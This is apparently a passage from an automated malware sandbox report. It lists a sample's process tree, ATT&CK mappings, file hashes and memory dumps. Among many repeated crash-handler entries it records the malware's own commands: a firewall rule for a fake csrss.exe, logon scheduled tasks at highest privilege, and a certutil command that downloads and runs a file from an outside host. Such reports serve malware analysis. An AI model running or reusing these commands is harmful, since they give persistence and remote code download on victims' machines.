3⤵
- Program crash
PID:2200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 684
3⤵
- Program crash
PID:4884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 700
3⤵
- Program crash
PID:3340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 692
3⤵
- Program crash
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 732
3⤵
- Program crash
PID:1588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 768
3⤵
- Program crash
PID:2396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 816
3⤵
- Program crash
PID:4400

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:3468

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies Windows Firewall
PID:2040

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 328
4⤵
- Program crash
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 332
4⤵
- Program crash
PID:968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 332
4⤵
- Program crash
PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 672
4⤵
- Program crash
PID:4000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 716
4⤵
- Program crash
PID:3132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 716
4⤵
- Program crash
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 740
4⤵
- Program crash
PID:1896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 748
4⤵
- Program crash
PID:4824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 764
4⤵
- Program crash
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 856
4⤵
- Program crash
PID:1644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 884
4⤵
- Program crash
PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 884
4⤵
- Program crash
PID:1484

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1556

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:5036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 960
4⤵
- Program crash
PID:932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 976
4⤵
- Program crash
PID:3988

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
- Executes dropped EXE
PID:3748

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 968
4⤵
- Program crash
PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 952
4⤵
- Program crash
PID:3532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1484
4⤵
- Program crash
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1500
4⤵
- Program crash
PID:4192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1464
4⤵
- Program crash
PID:1660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1452
4⤵
- Program crash
PID:2416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1612
4⤵
- Program crash
PID:4700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1628
4⤵
- Program crash
PID:1516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1696
4⤵
- Program crash
PID:3476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1652
4⤵
- Program crash
PID:432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1616
4⤵
- Program crash
PID:3240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1520
4⤵
- Program crash
PID:5048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 596
3⤵
- Program crash
PID:820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 788
2⤵
- Program crash
PID:4316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5044 -ip 5044
1⤵
PID:4900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5044 -ip 5044
1⤵
PID:2752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5044 -ip 5044
1⤵
PID:4128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5044 -ip 5044
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5044 -ip 5044
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5044 -ip 5044
1⤵
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5044 -ip 5044
1⤵
PID:1676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5044 -ip 5044
1⤵
PID:3604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5044 -ip 5044
1⤵
PID:4928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5044 -ip 5044
1⤵
PID:1452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5044 -ip 5044
1⤵
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5044 -ip 5044
1⤵
PID:4848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5044 -ip 5044
1⤵
PID:3920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5044 -ip 5044
1⤵
PID:212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5044 -ip 5044
1⤵
PID:1860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5044 -ip 5044
1⤵
PID:3616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5044 -ip 5044
1⤵
PID:2804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5044 -ip 5044
1⤵
PID:2992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5044 -ip 5044
1⤵
PID:4272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5044 -ip 5044
1⤵
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2076 -ip 2076
1⤵
PID:3092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2076 -ip 2076
1⤵
PID:2416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2076 -ip 2076
1⤵
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2076 -ip 2076
1⤵
PID:1268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2076 -ip 2076
1⤵
PID:3476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2076 -ip 2076
1⤵
PID:432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2076 -ip 2076
1⤵
PID:4500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2076 -ip 2076
1⤵
PID:4968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2076 -ip 2076
1⤵
PID:4044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2076 -ip 2076
1⤵
PID:2376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2076 -ip 2076
1⤵
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2076 -ip 2076
1⤵
PID:2316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3868 -ip 3868
1⤵
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3868 -ip 3868
1⤵
PID:2004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3868 -ip 3868
1⤵
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3868 -ip 3868
1⤵
PID:4696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3868 -ip 3868
1⤵
PID:832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3868 -ip 3868
1⤵
PID:3784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3868 -ip 3868
1⤵
PID:3992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3868 -ip 3868
1⤵
PID:2680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3868 -ip 3868
1⤵
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3868 -ip 3868
1⤵
PID:1208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3868 -ip 3868
1⤵
PID:4452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3868 -ip 3868
1⤵
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3868 -ip 3868
1⤵
PID:524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3868 -ip 3868
1⤵
PID:1512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3868 -ip 3868
1⤵
PID:4848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3868 -ip 3868
1⤵
PID:112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3868 -ip 3868
1⤵
PID:3708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3868 -ip 3868
1⤵
PID:2092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3868 -ip 3868
1⤵
PID:1144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3868 -ip 3868
1⤵
PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3868 -ip 3868
1⤵
PID:3908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3868 -ip 3868
1⤵
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3868 -ip 3868
1⤵
PID:2688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3868 -ip 3868
1⤵
PID:2200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3868 -ip 3868
1⤵
PID:2276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3868 -ip 3868
1⤵
PID:392

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
5625cb2982b7118b5e262fcfea2f4851

SHA1
f34e4c803b7b89d5342d50aa42b2cbd55845e373

SHA256
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e

SHA512
78f8e00bbdb173bc0646e6de3765001417c19a1431df763d2cb4113e5adfb9079dfde8611c490523bebae60dd696b2318a318d75c50c0c50a639d7938d773cf0

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
5625cb2982b7118b5e262fcfea2f4851

SHA1
f34e4c803b7b89d5342d50aa42b2cbd55845e373

SHA256
a7c9ca6b516a442a00c165a9ac1f86b485565f5b970c05a43d63e4916f33b61e

SHA512
78f8e00bbdb173bc0646e6de3765001417c19a1431df763d2cb4113e5adfb9079dfde8611c490523bebae60dd696b2318a318d75c50c0c50a639d7938d773cf0

Download Submit
memory/384-152-0x0000000000000000-mapping.dmp

Download
memory/1556-148-0x0000000000000000-mapping.dmp

Download
memory/2040-141-0x0000000000000000-mapping.dmp

Download
memory/2076-135-0x0000000000000000-mapping.dmp

Download
memory/2076-138-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/2076-139-0x0000000000F6B000-0x0000000001313000-memory.dmp

Filesize
3.7MB

Download
memory/2076-145-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/3468-140-0x0000000000000000-mapping.dmp

Download
memory/3748-150-0x0000000000000000-mapping.dmp

Download
memory/3868-147-0x0000000001400000-0x00000000017A8000-memory.dmp

Filesize
3.7MB

Download
memory/3868-142-0x0000000000000000-mapping.dmp

Download
memory/3868-146-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/3868-153-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/5036-149-0x0000000000000000-mapping.dmp

Download
memory/5044-132-0x00000000010BE000-0x0000000001466000-memory.dmp

Filesize
3.7MB

Download
memory/5044-137-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/5044-136-0x0000000001470000-0x0000000001C74000-memory.dmp

Filesize
8.0MB

Download
memory/5044-134-0x0000000000400000-0x0000000000C1E000-memory.dmp

Filesize
8.1MB

Download
memory/5044-133-0x0000000001470000-0x0000000001C74000-memory.dmp

Filesize
8.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads